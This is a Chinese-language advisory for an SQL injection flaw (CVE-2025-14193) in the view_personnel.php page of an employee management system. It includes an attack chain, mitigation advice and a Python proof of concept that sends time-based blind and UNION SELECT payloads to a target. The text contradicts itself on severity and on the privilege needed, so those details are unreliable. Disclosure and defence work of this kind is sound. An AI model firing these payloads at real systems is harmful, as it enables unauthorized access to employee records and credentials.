CVE-2025-14193 code-projects Employee Profile Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14193

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Employee Profile Management System 1.0

漏洞概述

CVE-2025-14193是code-projects公司开发的Employee Profile Management System（员工档案管理系统）1.0版本中的一个高危SQL注入漏洞。该系统是一款基于Web的员工信息管理平台，主要用于企业或组织内部对员工基本信息的录入、查询和管理功能。漏洞存在于系统的员工查看页面（view_personnel.php）中，具体问题出现在对用户输入参数per_id（员工ID）的处理上。攻击者可以通过构造恶意的SQL语句片段注入到per_id参数中，利用系统对用户输入验证和过滤不足的缺陷，绕过应用程序的前端限制，直接与后台数据库进行交互。该漏洞允许未经授权的远程攻击者在无需高权限或特殊身份的情况下发起攻击，成功利用后可导致数据库敏感信息泄露，包括员工个人信息、薪资数据、管理员账户凭证等。此外，攻击者还可能通过UNION SELECT等注入技术获取数据库结构信息，进一步进行数据篡改或完全接管系统。由于该漏洞已被公开披露并存在在野利用的可能性，建议相关用户立即采取修复措施。

技术细节

该SQL注入漏洞的根本原因在于应用程序对用户可控输入数据per_id参数缺乏充分的输入验证和参数化查询处理。在view_personnel.php文件中，系统通过GET请求获取per_id参数值，并直接将其拼接到SQL查询语句中执行。攻击者可以利用时间盲注（Time-based Blind SQL Injection）或布尔盲注（Boolean-based Blind SQL Injection）技术来验证漏洞存在并逐步提取数据库内容。由于SQL语句中使用了字符串拼接而非参数化查询，攻击者可以注入任意SQL代码。例如，通过提交per_id参数值为' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--，系统将执行时间延迟，证实漏洞存在。进一步利用可通过UNION注入获取数据库版本、当前用户、数据库名称等敏感信息，进而枚举数据表和字段内容。该漏洞的CVSS评分6.3反映了其在网络环境下可被低权限用户远程利用，机密性、完整性和可用性均有较低影响的特点。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标系统为code-projects Employee Profile Management System 1.0，并定位到存在漏洞的页面view_personnel.php

STEP 2

步骤2

漏洞探测：攻击者构造测试载荷（如时间盲注payload）发送到/view_personnel.php?per_id参数，验证SQL注入漏洞是否存在

STEP 3

步骤3

信息收集：利用UNION注入或布尔盲注技术获取数据库版本、表结构、字段名称等元数据信息

STEP 4

步骤4

数据窃取：通过构造SQL查询语句提取敏感数据，如员工个人信息、薪资数据、用户账户凭证等

STEP 5

步骤5

权限提升：尝试获取数据库管理员权限或通过获取的凭证进一步控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14193 PoC - Employee Profile Management System SQL Injection
# Target: /view_personnel.php?per_id=[SQL Injection Payload]

import requests
import sys

def test_sqli(target_url):
    """Test for SQL injection vulnerability"""
    
    # Normal request (baseline)
    normal_url = f"{target_url}/view_personnel.php?per_id=1"
    
    # Time-based blind SQL injection payload
    # If vulnerable, the response will be delayed by ~5 seconds
    sqli_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
    sqli_url = f"{target_url}/view_personnel.php?per_id={sqli_payload}"
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Normal request URL: {normal_url}")
    
    try:
        # Send normal request
        print("\n[+] Sending normal request...")
        response1 = requests.get(normal_url, timeout=10)
        print(f"[+] Status code: {response1.status_code}")
        
        # Send SQL injection request
        print("\n[+] Sending SQL injection payload...")
        import time
        start = time.time()
        response2 = requests.get(sqli_url, timeout=30)
        elapsed = time.time() - start
        
        print(f"[+] Status code: {response2.status_code}")
        print(f"[+] Response time: {elapsed:.2f} seconds")
        
        # Verify vulnerability
        if elapsed >= 5:
            print("\n[!] VULNERABLE: Time-based SQL injection confirmed!")
            print(f"[!] Response was delayed by {elapsed:.2f} seconds")
            return True
        else:
            print("\n[-] Not vulnerable or target not reachable")
            return False
            
    except requests.exceptions.Timeout:
        print("\n[!] VULNERABLE: Request timed out (possible SQL injection)")
        return True
    except Exception as e:
        print(f"\n[-] Error: {str(e)}")
        return False

def extract_data(target_url):
    """Extract database information using SQL injection"""
    
    # Database version extraction
    payload_version = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--"
    url = f"{target_url}/view_personnel.php?per_id={payload_version}"
    
    print(f"\n[*] Extracting database version...")
    print(f"[*] Payload: {payload_version}")
    
    try:
        response = requests.get(url, timeout=10)
        if '5.' in response.text or '8.' in response.text:
            print(f"[+] Database version detected in response")
    except Exception as e:
        print(f"[-] Error extracting data: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14193_poc.py <target_url>")
        print("Example: python cve-2025-14193_poc.py http://localhost/employee_management")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    vulnerable = test_sqli(target)
    
    if vulnerable:
        extract_data(target)

影响范围

code-projects Employee Profile Management System 1.0

防御指南

临时缓解措施

立即停止使用受影响版本的Employee Profile Management System，或在web应用层面对view_personnel.php页面的per_id参数实施严格的输入过滤和验证。在无法立即升级的情况下，可通过配置Web应用防火墙规则拦截包含SQL注入特征的请求（如单引号、UNION、SELECT等关键字）。同时建议对数据库账户权限进行限制，移除不必要的数据库用户权限，防止攻击成功后进行横向扩展。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14193
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14193
3 Details https://www.cvedetails.com/cve/CVE-2025-14193/
4 VulDB https://vuldb.com/cve/CVE-2025-14193
5 Link https://code-projects.org/
6 Link https://github.com/shenxianyuguitian/employee-management-SQL
7 Link https://vuldb.com/?ctiid.334613
8 Link https://vuldb.com/?id.334613
9 Link https://vuldb.com/?submit.699245